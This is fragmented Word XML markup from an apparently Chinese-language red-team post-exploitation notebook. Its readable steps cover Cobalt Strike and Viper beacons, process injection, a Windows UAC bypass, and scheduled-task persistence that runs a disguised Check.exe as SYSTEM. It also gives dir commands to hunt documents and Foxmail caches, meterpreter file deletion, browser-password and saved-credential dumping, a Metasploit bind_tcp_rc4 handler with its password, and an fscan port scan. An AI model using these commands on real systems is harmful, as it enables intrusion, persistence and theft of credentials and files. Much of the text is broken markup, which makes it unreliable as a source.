      <w:bookmarkStart w:id="93" w:name="_Toc1717"/>
      <w:bookmarkStart w:id="94" w:name="_Toc18592"/>
      <w:bookmarkStart w:id="95" w:name="_Toc28718"/>
      <w:bookmarkStart w:id="96" w:name="_Toc25047"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上查看计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="9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65905" cy="1546225"/>
            <wp:effectExtent l="0" t="0" r="317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 w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc1488"/>
      <w:bookmarkStart w:id="98" w:name="_Toc2204"/>
      <w:bookmarkStart w:id="99" w:name="_Toc13953"/>
      <w:bookmarkStart w:id="100" w:name="_Toc1431"/>
      <w:bookmarkStart w:id="101" w:name="_Toc27166"/>
      <w:bookmarkStart w:id="102" w:name="_Toc3253"/>
      <w:bookmarkStart w:id="103" w:name="_Toc2051"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs上线信息：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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5273675" cy="2721610"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:docPr id="124" name="图片 124" descr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04" w:name="_Toc6145"/>
      <w:bookmarkStart w:id="105" w:name="_Toc1429"/>
      <w:bookmarkStart w:id="106" w:name="_Toc25883"/>
      <w:bookmarkStart w:id="107" w:name="_Toc979"/>
      <w:bookmarkStart w:id="108" w:name="_Toc15990"/>
      <w:bookmarkStart w:id="109" w:name="_Toc6675"/>
      <w:bookmarkStart w:id="110" w:name="_Toc6705"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper上线信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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4239260" cy="2252345"/>
            <wp:effectExtent l="0" t="0" r="12700" b="3175"/>
            <wp:docPr id="4" name="图片 4" descr="vi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vipe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11" w:name="_Toc9884"/>
      <w:bookmarkStart w:id="112" w:name="_Toc2062"/>
      <w:bookmarkStart w:id="113" w:name="_Toc23825"/>
      <w:bookmarkStart w:id="114" w:name="_Toc14259"/>
      <w:bookmarkStart w:id="115" w:name="_Toc14315"/>
      <w:bookmarkStart w:id="116" w:name="_Toc6802"/>
      <w:bookmarkStart w:id="117" w:name="_Toc11307"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建自守护session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="11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05885" cy="2310130"/>
            <wp:effectExtent l="0" t="0" r="10795" b="635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18" w:name="_Toc17441"/>
      <w:bookmarkStart w:id="119" w:name="_Toc28695"/>
      <w:bookmarkStart w:id="120" w:name="_Toc28908"/>
      <w:bookmarkStart w:id="121" w:name="_Toc18834"/>
      <w:bookmarkStart w:id="122" w:name="_Toc17799"/>
      <w:bookmarkStart w:id="123" w:name="_Toc16994"/>
      <w:bookmarkStart w:id="124" w:name="_Toc31918"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程注入：可以x86注入到x64位进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkEnd w:id="12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09465" cy="2389505"/>
            <wp:effectExtent l="0" t="0" r="8255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25" w:name="_Toc27721"/>
      <w:bookmarkStart w:id="126" w:name="_Toc24828"/>
      <w:bookmarkStart w:id="127" w:name="_Toc7316"/>
      <w:bookmarkStart w:id="128" w:name="_Toc23306"/>
      <w:bookmarkStart w:id="129" w:name="_Toc8488"/>
      <w:bookmarkStart w:id="130" w:name="_Toc20870"/>
      <w:bookmarkStart w:id="131" w:name="_Toc1254"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提权：Windows UAC绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="13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21785" cy="2176780"/>
            <wp:effectExtent l="0" t="0" r="8255" b="254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32" w:name="_Toc478"/>
      <w:bookmarkStart w:id="133" w:name="_Toc8115"/>
      <w:bookmarkStart w:id="134" w:name="_Toc13741"/>
      <w:bookmarkStart w:id="135" w:name="_Toc17447"/>
      <w:bookmarkStart w:id="136" w:name="_Toc18411"/>
      <w:bookmarkStart w:id="137" w:name="_Toc11973"/>
      <w:bookmarkStart w:id="138" w:name="_Toc30792"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Viper创建计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="13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04690" cy="2480310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="381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139" w:name="_Toc4496"/>
      <w:bookmarkStart w:id="140" w:name="_Toc7601"/>
      <w:bookmarkStart w:id="141" w:name="_Toc14333"/>
      <w:bookmarkStart w:id="142" w:name="_Toc24043"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务详情：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>
      <w:bookmarkEnd w:id="14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-------------------------------------------------------------------------------------------------------------------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Name               : Daily Check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（任务名）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Path               : \Daily Check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State              : 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Enabled            : True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LastRunTime        : 2022/11/4 11:55:01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（最新运行时间）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LastTaskResult     : 267009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NumberOfMissedRuns : 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NextRunTime        : 2022/11/4 12:55:00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（下次运行时间）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Definition         : System.__ComObject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Xml                : &lt;?xml version="1.0" encoding="UTF-16"?&gt;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&lt;Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;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&lt;RegistrationInfo&gt;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&lt;Author&gt;Windows office&lt;/Author&gt;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&lt;URI&gt;\Daily Check&lt;/URI&gt;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&lt;/RegistrationInfo&gt;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&lt;Principals&gt;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&lt;Principal id="Author"&gt;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&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;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&lt;/Principal&gt;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&lt;/Principals&gt;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&lt;Settings&gt;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&lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt;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&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;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&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;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&lt;IdleSettings&gt;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&lt;Duration&gt;PT10M&lt;/Duration&gt;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&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;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&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;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&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;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&lt;/IdleSettings&gt;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&lt;/Settings&gt;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&lt;Triggers&gt;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&lt;CalendarTrigger id="DailyTrigger1"&gt;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&lt;StartBoundary&gt;2005-01-01T10:55:00&lt;/StartBoundary&gt;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&lt;EndBoundary&gt;2030-12-12T10:05:00&lt;/EndBoundary&gt;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&lt;Repetition&gt;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  &lt;Interval&gt;PT1H&lt;/Interval&gt;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（间隔1小时）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  &lt;Duration&gt;P1D&lt;/Duration&gt;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（间隔1天）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&lt;/Repetition&gt;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&lt;ScheduleByDay&gt;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  &lt;DaysInterval&gt;1&lt;/DaysInterval&gt;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（间隔1天）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&lt;/ScheduleByDay&gt;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&lt;/CalendarTrigger&gt;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&lt;/Triggers&gt;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&lt;Actions Context="Author"&gt;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&lt;Exec&gt;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  &lt;Command&gt;C:\ProgramData\Microsoft_YeYiBr\Check.exe&lt;/Command&gt;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（命令行执行命令）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  &lt;/Exec&gt;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  &lt;/Actions&gt;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                    &lt;/Task&gt;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EXE路径: C:\ProgramData\Microsoft_YeYiBr\Check.exe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用户下次登录时生效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-------------------------------------------------------------------------------------------------------------------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43" w:name="_Toc15881"/>
      <w:bookmarkStart w:id="144" w:name="_Toc12953"/>
      <w:bookmarkStart w:id="145" w:name="_Toc28578"/>
      <w:bookmarkStart w:id="146" w:name="_Toc14976"/>
      <w:bookmarkStart w:id="147" w:name="_Toc12175"/>
      <w:bookmarkStart w:id="148" w:name="_Toc32624"/>
      <w:bookmarkStart w:id="149" w:name="_Toc12509"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索dir命令：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149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dir d:\*.xls* /s /o-d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dir d:\*.doc* /s /o-d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dir d:\*.pdf* /s /o-d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dir d:\*.ppt* /s /o-d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dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:\*Account.rec0* /s /o-d   （foxmail缓存文件）</w:t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解释：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/o-d：结果按最晚的日期排列（升序）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/s：搜索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50" w:name="_Toc11700"/>
      <w:bookmarkStart w:id="151" w:name="_Toc25331"/>
      <w:bookmarkStart w:id="152" w:name="_Toc129"/>
      <w:bookmarkStart w:id="153" w:name="_Toc2369"/>
      <w:bookmarkStart w:id="154" w:name="_Toc30039"/>
      <w:bookmarkStart w:id="155" w:name="_Toc27888"/>
      <w:bookmarkStart w:id="156" w:name="_Toc5107"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除del命令：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156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del /a /f /q 新建文本文档.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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00000"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="96" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Consolas" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Consolas" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="000000"/>
        </w:rPr>
        <w:t>meterpreter &gt; shell del /a /f /q 新建文本文档.txt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57" w:name="_Toc9694"/>
      <w:bookmarkStart w:id="158" w:name="_Toc20111"/>
      <w:bookmarkStart w:id="159" w:name="_Toc8955"/>
      <w:bookmarkStart w:id="160" w:name="_Toc15075"/>
      <w:bookmarkStart w:id="161" w:name="_Toc15824"/>
      <w:bookmarkStart w:id="162" w:name="_Toc21679"/>
      <w:bookmarkStart w:id="163" w:name="_Toc14089"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>迁移到cs:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
      <w:bookmarkEnd w:id="163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32455" cy="1781810"/>
            <wp:effectExtent l="0" t="0" r="6985" b="12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64" w:name="_Toc14600"/>
      <w:bookmarkStart w:id="165" w:name="_Toc13454"/>
      <w:bookmarkStart w:id="166" w:name="_Toc6772"/>
      <w:bookmarkStart w:id="167" w:name="_Toc10787"/>
      <w:bookmarkStart w:id="168" w:name="_Toc17467"/>
      <w:bookmarkStart w:id="169" w:name="_Toc1919"/>
      <w:bookmarkStart w:id="170" w:name="_Toc9100"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs获取浏览器密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3703320" cy="1974850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1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71" w:name="_Toc5213"/>
      <w:bookmarkStart w:id="172" w:name="_Toc31974"/>
      <w:bookmarkStart w:id="173" w:name="_Toc14107"/>
      <w:bookmarkStart w:id="174" w:name="_Toc21974"/>
      <w:bookmarkStart w:id="175" w:name="_Toc7482"/>
      <w:bookmarkStart w:id="176" w:name="_Toc26505"/>
      <w:bookmarkStart w:id="177" w:name="_Toc2974"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs查看保存凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
      <w:bookmarkEnd w:id="176"/>
      <w:bookmarkEnd w:id="17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67505" cy="2513330"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1270"/>
            <wp:docPr id="125" name="图片 125" descr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78" w:name="_Toc1660"/>
      <w:bookmarkStart w:id="179" w:name="_Toc19843"/>
      <w:bookmarkStart w:id="180" w:name="_Toc1980"/>
      <w:bookmarkStart w:id="181" w:name="_Toc11291"/>
      <w:bookmarkStart w:id="182" w:name="_Toc30936"/>
      <w:bookmarkStart w:id="183" w:name="_Toc13371"/>
      <w:bookmarkStart w:id="184" w:name="_Toc32144"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载CS插件:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184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185" w:name="_Toc16386"/>
      <w:bookmarkStart w:id="186" w:name="_Toc25092"/>
      <w:bookmarkStart w:id="187" w:name="_Toc30892"/>
      <w:bookmarkStart w:id="188" w:name="_Toc12159"/>
      <w:bookmarkStart w:id="189" w:name="_Toc27393"/>
      <w:bookmarkStart w:id="190" w:name="_Toc3085"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>插件下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190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巨龙拉冬：知识星球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梼杌：https://github.com/pandasec888/taowu-cobalt-strike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51250" cy="1983105"/>
            <wp:effectExtent l="0" t="0" r="6350" b="133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191" w:name="_Toc20420"/>
      <w:bookmarkStart w:id="192" w:name="_Toc16423"/>
      <w:bookmarkStart w:id="193" w:name="_Toc9763"/>
      <w:bookmarkStart w:id="194" w:name="_Toc9992"/>
      <w:bookmarkStart w:id="195" w:name="_Toc32131"/>
      <w:bookmarkStart w:id="196" w:name="_Toc1378"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载cs插件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
      <w:bookmarkEnd w:id="196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970020" cy="2101215"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="127" name="图片 127" descr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197" w:name="_Toc5051"/>
      <w:bookmarkStart w:id="198" w:name="_Toc5946"/>
      <w:bookmarkStart w:id="199" w:name="_Toc31363"/>
      <w:bookmarkStart w:id="200" w:name="_Toc27933"/>
      <w:bookmarkStart w:id="201" w:name="_Toc26750"/>
      <w:bookmarkStart w:id="202" w:name="_Toc14695"/>
      <w:bookmarkStart w:id="203" w:name="_Toc3450"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows杀进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>taskkill命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="202"/>
      <w:bookmarkEnd w:id="203"/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taskkill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/F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t xml:space="preserve"> /PID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  15688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13200" cy="626110"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1397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204" w:name="_Toc13007"/>
      <w:bookmarkStart w:id="205" w:name="_Toc31642"/>
      <w:bookmarkStart w:id="206" w:name="_Toc31636"/>
      <w:bookmarkStart w:id="207" w:name="_Toc26959"/>
      <w:bookmarkStart w:id="208" w:name="_Toc12309"/>
      <w:bookmarkStart w:id="209" w:name="_Toc10548"/>
      <w:bookmarkStart w:id="210" w:name="_Toc3562"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看进程启动命令行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>wmic命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
      <w:bookmarkEnd w:id="209"/>
      <w:bookmarkEnd w:id="21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wmic process where caption="check.exe" get caption,commandline /value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27500" cy="601345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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或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wmic process get name,executablepath,processid|findstr 1667528874.exe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43375" cy="553085"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1079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211" w:name="_Toc3311"/>
      <w:bookmarkStart w:id="212" w:name="_Toc17587"/>
      <w:bookmarkStart w:id="213" w:name="_Toc7262"/>
      <w:bookmarkStart w:id="214" w:name="_Toc22179"/>
      <w:bookmarkStart w:id="215" w:name="_Toc23436"/>
      <w:bookmarkStart w:id="216" w:name="_Toc4760"/>
      <w:bookmarkStart w:id="217" w:name="_Toc22729"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用msf正向连接：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
      <w:bookmarkEnd w:id="215"/>
      <w:bookmarkEnd w:id="216"/>
      <w:bookmarkEnd w:id="217"/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18" w:name="_Toc12776"/>
      <w:bookmarkStart w:id="219" w:name="_Toc16802"/>
      <w:bookmarkStart w:id="220" w:name="_Toc24978"/>
      <w:bookmarkStart w:id="221" w:name="_Toc11807"/>
      <w:bookmarkStart w:id="222" w:name="_Toc3829"/>
      <w:bookmarkStart w:id="223" w:name="_Toc13263"/>
      <w:bookmarkStart w:id="224" w:name="_Toc32219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成监听载荷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
      <w:bookmarkEnd w:id="22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64305" cy="2305685"/>
            <wp:effectExtent l="0" t="0" r="13335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25" w:name="_Toc9231"/>
      <w:bookmarkStart w:id="226" w:name="_Toc30221"/>
      <w:bookmarkStart w:id="227" w:name="_Toc681"/>
      <w:bookmarkStart w:id="228" w:name="_Toc7669"/>
      <w:bookmarkStart w:id="229" w:name="_Toc32688"/>
      <w:bookmarkStart w:id="230" w:name="_Toc26325"/>
      <w:bookmarkStart w:id="231" w:name="_Toc9371"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="230"/>
      <w:bookmarkEnd w:id="23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use exploit/multi/handler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search rc4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set payload payload/windows/x64/meterpreter/bind_tcp_rc4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show options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set rhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.167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set lport 5555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set RC4PASSWORD cpnvePfH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show options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Exploit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93440" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="5080" b="889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32" w:name="_Toc22335"/>
      <w:bookmarkStart w:id="233" w:name="_Toc4617"/>
      <w:bookmarkStart w:id="234" w:name="_Toc3313"/>
      <w:bookmarkStart w:id="235" w:name="_Toc17226"/>
      <w:bookmarkStart w:id="236" w:name="_Toc18536"/>
      <w:bookmarkStart w:id="237" w:name="_Toc27323"/>
      <w:bookmarkStart w:id="238" w:name="_Toc1297"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="23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fscan64.exe -h </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1-65525 -np -nobr -nopoc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16070" cy="1743710"/>
